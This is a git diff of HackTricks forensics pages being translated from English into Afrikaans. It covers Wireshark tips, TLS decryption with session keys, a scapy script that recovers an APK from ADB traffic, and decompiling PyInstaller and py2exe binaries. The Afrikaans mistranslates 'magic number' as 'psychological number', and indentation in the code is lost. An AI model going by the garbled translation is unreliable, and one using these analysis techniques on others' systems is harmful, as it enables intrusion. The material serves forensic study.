[**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Improve your Wireshark skills +## Verbeter jou Wireshark-vaardighede -### Tutorials +### Tutoriale -The following tutorials are amazing to learn some cool basic tricks: +Die volgende tutoriale is fantasties om 'n paar koel basiese truuks te leer: * [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/) * [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/) * [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/) * [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/) -### Analysed Information +### Geanaliseerde inligting -**Expert Information** +**Ekspertinligting** -Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**: +Deur te klik op _**Analyze** --> **Expert Information**_ sal jy 'n **oorsig** kry van wat in die geanaliseerde pakkies gebeur: ![](<../../../.gitbook/assets/image (570).png>) -**Resolved Addresses** +**Opgeloste adresse** -Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication. +Onder _**Statistics --> Resolved Addresses**_ kan jy verskeie **inligting** vind wat deur Wireshark "**opgelos**" is, soos poort/vervoer na protokol, MAC na die vervaardiger, ens. Dit is interessant om te weet wat betrokke is in die kommunikasie. 
![](<../../../.gitbook/assets/image (571).png>) -**Protocol Hierarchy** +**Protokolhiërargie** -Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them. +Onder _**Statistics --> Protocol Hierarchy**_ kan jy die **protokolle** vind wat betrokke is by die kommunikasie en inligting daaroor. ![](<../../../.gitbook/assets/image (572).png>) -**Conversations** +**Gesprekke** -Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them. +Onder _**Statistics --> Conversations**_ kan jy 'n **opsomming van die gesprekke** in die kommunikasie vind en inligting daaroor. ![](<../../../.gitbook/assets/image (573).png>) -**Endpoints** +**Eindpunte** -Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them. +Onder _**Statistics --> Endpoints**_ kan jy 'n **opsomming van die eindpunte** in die kommunikasie vind en inligting daaroor. ![](<../../../.gitbook/assets/image (575).png>) -**DNS info** +**DNS-inligting** -Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured. +Onder _**Statistics --> DNS**_ kan jy statistieke oor die vasgevangste DNS-versoek vind. ![](<../../../.gitbook/assets/image (577).png>) -**I/O Graph** +**I/O-grafiek** -Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.** +Onder _**Statistics --> I/O Graph**_ kan jy 'n **grafiek van die kommunikasie** vind. 
![](<../../../.gitbook/assets/image (574).png>) -### Filters +### Filtreerders -Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ -Other interesting filters: +Hier kan jy Wireshark-filtreerders vind, afhangende van die protokol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ +Ander interessante filtreerders: * `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic +* HTTP- en aanvanklike HTTPS-verkeer * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic + TCP SYN +* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic + TCP SYN + DNS requests +* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN + DNS-versoeke -### Search +### Soek -If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column. +As jy wil **soek** na **inhoud** binne die **pakkies** van die sessies, druk _CTRL+f_. Jy kan nuwe lae byvoeg tot die hoofinligtingstabel (No., Tyd, Bron, ens.) deur die regterknoppie te druk en dan die kolom te wysig. 
-### Free pcap labs +### Gratis pcap-laboratoriums -**Practice with the free challenges of: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** +**Oefen met die gratis uitdagings van: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** -## Identifying Domains +## Identifiseer domeine -You can add a column that shows the Host HTTP header: +Jy kan 'n kolom byvoeg wat die Host HTTP-kop wys: ![](<../../../.gitbook/assets/image (403).png>) -And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**): +En 'n kolom wat die Bedienernaam byvoeg van 'n inisieerende HTTPS-verbinding (**ssl.handshake.type == 1**): ![](<../../../.gitbook/assets/image (408) (1).png>) -## Identifying local hostnames +## Identifiseer plaaslike hostnames -### From DHCP +### Vanaf DHCP -In current Wireshark instead of `bootp` you need to search for `DHCP` +In die huidige Wireshark moet jy in plaas van `bootp` soek vir `DHCP` ![](<../../../.gitbook/assets/image (404).png>) -### From NBNS +### Vanaf NBNS ![](<../../../.gitbook/assets/image (405).png>) -## Decrypting TLS +## Ontsleutel TLS -### Decrypting https traffic with server private key +### Ontsleutel https-verkeer met bedienerprivaatsleutel _edit>preference>protocol>ssl>_ ![](<../../../.gitbook/assets/image (98).png>) -Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_) +Druk _Edit_ en voeg al die data van die bediener en die privaatsleutel by (_IP, Poort, Protokol, Sleutel-lêer en wagwoord_) -### Decrypting https traffic with symmetric session keys +### Ontsleutel https-verkeer met simmetriese sessiesleutels -Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. 
More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). +Beide Firefox en Chrome het die vermoë om TLS-sessiesleutels te log, wat met Wireshark gebruik kan word om TLS-verkeer te ontsleutel. Dit maak diepgaande analise van veilige kommunikasie moontlik. Meer besonderhede oor hoe om hierdie ontsleuteling uit te voer, is te vinde in 'n gids by [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). -To detect this search inside the environment for to variable `SSLKEYLOGFILE` +Om dit op te spoor, soek binne die omgewing na die veranderlike `SSLKEYLOGFILE` -A file of shared keys will look like this: +'n Lêer van gedeelde sleutels sal so lyk: ![](<../../../.gitbook/assets/image (99).png>) -To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename: +Om dit in Wireshark in te voer, gaan na \_edit > preference > protocol > ssl > en voer dit in (Pre)-Master-Secret log filename: ![](<../../../.gitbook/assets/image (100).png>) -## ADB communication - -Extract an APK from an ADB communication where the APK was sent: +## ADB-kommunikasie +Onttrek 'n APK uit 'n ADB-kommunikasie waar die APK gestuur is: ```python from scapy.all import * pcap = rdpcap("final2.pcapng") def rm_data(data): - splitted = data.split(b"DATA") - if len(splitted) == 1: - return data - else: - return splitted[0]+splitted[1][4:] +splitted = data.split(b"DATA") +if len(splitted) == 1: +return data +else: +return splitted[0]+splitted[1][4:] all_bytes = b"" for pkt in pcap: - if Raw in pkt: - a = pkt[Raw] - if b"WRTE" == bytes(a)[:4]: - all_bytes += rm_data(bytes(a)[24:]) - else: - all_bytes += rm_data(bytes(a)) +if Raw in pkt: +a = pkt[Raw] +if b"WRTE" == bytes(a)[:4]: +all_bytes += rm_data(bytes(a)[24:]) +else: +all_bytes += rm_data(bytes(a)) print(all_bytes) f = open('all_bytes.data', 'w+b') f.write(all_bytes) 
f.close() ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index 7c180fcf8..d5199a752 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -1,89 +1,78 @@ -# Decompile compiled python binaries (exe, elf) - Retreive from .pyc +# Ontkompilering van gekompileerde Python-binêre (exe, elf) - Herwin vanaf .pyc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## From Compiled Binary to .pyc - -From an **ELF** compiled binary you can **get the .pyc** with: +## Vanaf Gekompileerde Binêre na .pyc +Vanaf 'n **ELF** gekompileerde binêre kan jy die **.pyc** kry met: ```bash pyi-archive_viewer # The list of python modules will be given here: [(0, 230, 311, 1, 'm', 'struct'), - (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), - (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), - (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), - (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), - (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), - (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), - (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), - (15090, 445, 672, 1, 's', 'pyi_rth_inspect'), - (15535, 2514, 4421, 1, 's', 'binary_name'), +(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), +(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), +(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), +(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), +(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), +(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), +(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), +(15090, 445, 672, 1, 's', 'pyi_rth_inspect'), +(15535, 2514, 4421, 1, 's', 'binary_name'), ... ? X binary_name to filename? 
/tmp/binary.pyc ``` - -In a **python exe binary** compiled you can **get the .pyc** by running: - +In 'n **python exe binêre** wat gekompileer is, kan jy die .pyc kry deur die volgende uit te voer: ```bash python pyinstxtractor.py executable.exe ``` +## Van .pyc na Python-kode -## From .pyc to python code - -For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**: - +Vir die **.pyc**-data ("gekompileerde" Python) moet jy begin om te probeer om die **oorspronklike** **Python**-kode te **onttrek**: ```bash uncompyle6 binary.pyc > decompiled.py ``` +**Maak seker** dat die binêre lêer die **uitbreiding** "**.pyc**" het (as dit nie die geval is nie, sal uncompyle6 nie werk nie) -**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work) - -While executing **uncompyle6** you might find the **following errors**: - -### Error: Unknown magic number 227 +Terwyl jy **uncompyle6** uitvoer, mag jy die **volgende foute** teëkom: +### Fout: Onbekende magiese nommer 227 ```bash /kali/.local/bin/uncompyle6 /tmp/binary.pyc Unknown magic number 227 in /tmp/binary.pyc ``` +Om dit reg te stel, moet jy die korrekte "magic number" by die begin van die gegenereerde lêer voeg. -To fix this you need to **add the correct magic number** at the beginning of the generated file. 
- -**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute: - +"Magic numbers" verskil met die Python-weergawe, om die "magic number" van Python 3.8 te kry, moet jy 'n Python 3.8-terminal oopmaak en die volgende uitvoer: ``` >> import imp >> imp.get_magic().hex() '550d0d0a' ``` +Die **sielkundige nommer** in hierdie geval vir python3.8 is **`0x550d0d0a`**, dan, om hierdie fout reg te stel, sal jy nodig hê om dit by die **begin** van die **.pyc-lêer** die volgende bytes by te voeg: `0x0d550a0d000000000000000000000000` -The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000` - -**Once** you have **added** that magic header, the **error should be fixed.** - -This is how a correctly added **.pyc python3.8 magic header** will look like: +**Sodra** jy daardie sielkundige kop bygevoeg het, behoort die **fout reggestel te wees.** +So lyk 'n korrek bygevoegde **.pyc python3.8 sielkundige kop**: ```bash hexdump 'binary.pyc' | head 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000 
@@ -91,28 +80,26 @@ hexdump 'binary.pyc' | head 0000020 0700 0000 4000 0000 7300 0132 0000 0064 0000030 0164 006c 005a 0064 0164 016c 015a 0064 ``` +### Fout: Decompiling generiese foute -### Error: Decompiling generic errors +**Ander foute** soos: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` kan voorkom. -**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear. +Dit beteken waarskynlik dat jy die **sielkundige nommer nie korrek bygevoeg het nie** of dat jy nie die **korrekte sielkundige nommer gebruik het nie**, so maak **seker dat jy die korrekte een gebruik** (of probeer 'n nuwe een). -This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one). +Kyk na die vorige foutdokumentasie. -Check the previous error documentation. +## Outomatiese hulpmiddel -## Automatic Tool +Die **[python-exe-unpacker-hulpmiddel](https://github.com/countercept/python-exe-unpacker)** dien as 'n kombinasie van verskeie gemeenskapsbeskikbare hulpmiddels wat ontleders help om uitvoerbare lêers wat in Python geskryf is, te ontleed en te dekompilieer, spesifiek dié wat met py2exe en pyinstaller geskep is. Dit sluit YARA-reëls in om te identifiseer of 'n uitvoerbare lêer op Python gebaseer is en bevestig die skeppingstool. -The **[python-exe-unpacker tool](https://github.com/countercept/python-exe-unpacker)** serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool. 
+### ImportError: Lêernaam: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' bestaan nie -### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist - -A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process. - -Example of the issue: +'n Algemene probleem wat ondervind word, behels 'n onvolledige Python-sielkode-lêer as gevolg van die **ontpakkingsproses met unpy2exe of pyinstxtractor**, wat dan **nie deur uncompyle6 erken word nie as gevolg van 'n ontbrekende Python-sielkode-weergawe-nommer**. Om dit aan te spreek, is 'n voorvoegselopsie bygevoeg wat die nodige Python-sielkode-weergawe-nommer byvoeg en die dekompilasieproses vergemaklik. +Voorbeeld van die probleem: ```python # Error when attempting to decompile without the prepend option -test@test: uncompyle6 unpacked/malware_3.exe/archive.py +test@test: uncompyle6 unpacked/malware_3.exe/archive.py Traceback (most recent call last): ... ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist 
@@ -127,11 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive # Successfully decompiled file [+] Successfully decompiled. ``` +## Analiseer Python-samestelling -## Analyzing python assembly - -If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2: - +As jy nie in staat was om die oorspronklike Python-kode te onttrek nie volgens die vorige stappe, kan jy probeer om die samestelling te onttrek (maar dit is nie baie beskrywend nie, so probeer weer om die oorspronklike kode te onttrek). Ek het 'n baie eenvoudige kode gevind om die _.pyc_ binêre kode te ontbind (sterkte met die verstaan van die kodevloei) [hier](https://bits.theorem.co/protecting-a-python-codebase/). As die _.pyc_ van Python2 afkomstig is, gebruik Python2: ```bash >>> import dis >>> import marshal 
@@ -157,34 +142,32 @@ True >>> >>> # Disassemble the code object >>> dis.disassemble(code) - 1 0 LOAD_CONST 0 () - 3 MAKE_FUNCTION 0 - 6 STORE_NAME 0 (hello_world) - 9 LOAD_CONST 1 (None) - 12 RETURN_VALUE +1 0 LOAD_CONST 0 () +3 MAKE_FUNCTION 0 +6 STORE_NAME 0 (hello_world) +9 LOAD_CONST 1 (None) +12 RETURN_VALUE >>> >>> # Also disassemble that const being loaded (our function) >>> dis.disassemble(code.co_consts[0]) - 2 0 LOAD_CONST 1 ('Hello {0}') - 3 LOAD_ATTR 0 (format) - 6 LOAD_FAST 0 (name) - 9 CALL_FUNCTION 1 - 12 PRINT_ITEM - 13 PRINT_NEWLINE - 14 LOAD_CONST 0 (None) - 17 RETURN_VALUE +2 0 LOAD_CONST 1 ('Hello {0}') +3 LOAD_ATTR 0 (format) +6 LOAD_FAST 0 (name) +9 CALL_FUNCTION 1 +12 PRINT_ITEM +13 PRINT_NEWLINE +14 LOAD_CONST 0 (None) +17 RETURN_VALUE ``` +## Python na Uitvoerbare lêer -## Python to Executable +Om te begin, gaan ons jou wys hoe ladingstukke gekompileer kan word in py2exe en PyInstaller. -To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller. - -### To create a payload using py2exe: - -1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org) -2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe. -3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2. +### Om 'n ladingstuk te skep met behulp van py2exe: +1. Installeer die py2exe-pakket vanaf [http://www.py2exe.org/](http://www.py2exe.org) +2. Vir die ladingstuk (in hierdie geval noem ons dit hello.py), gebruik 'n skripsie soos die een in Figuur 1. Die opsie "bundle\_files" met die waarde van 1 sal alles insluitend die Python-tolk in een uitvoerbare lêer saamvoeg. +3. Sodra die skripsie gereed is, sal ons die opdrag "python setup.py py2exe" uitreik. 
Dit sal die uitvoerbare lêer skep, net soos in Figuur 2. ```python from distutils.core import setup import py2exe, sys, os @@ -192,10 +175,10 @@ import py2exe, sys, os sys.argv.append('py2exe') setup( - options = {'py2exe': {'bundle_files': 1}}, - #windows = [{'script': "hello.py"}], - console = [{'script': "hello.py"}], - zipfile = None, +options = {'py2exe': {'bundle_files': 1}}, +#windows = [{'script': "hello.py"}], +console = [{'script': "hello.py"}], +zipfile = None, ) ``` @@ -212,12 +195,10 @@ running py2exe copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe ``` +### Om 'n payload te skep met behulp van PyInstaller: -### To create a payload using PyInstaller: - -1. Install PyInstaller using pip (pip install pyinstaller). -2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable. - +1. Installeer PyInstaller met behulp van pip (pip install pyinstaller). +2. Daarna sal ons die opdrag "pyinstaller --onefile hello.py" uitreik (let wel dat 'hello.py' ons payload is). Dit sal alles saamvoeg in een uitvoerbare lêer. ``` C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 108 INFO: PyInstaller: 3.3.1 
@@ -230,27 +211,26 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe 6325 INFO: Building EXE from out00-EXE.toc completed successfully. ``` - -## References +## Verwysings * [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 709547f0d..70fc4338f 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,21 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-Here you can find interesting tricks for specific file-types and/or software: +Hier kan jy interessante truuks vir spesifieke lêertipes en/of sagteware vind: {% page-ref page=".pyc.md" %} @@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die 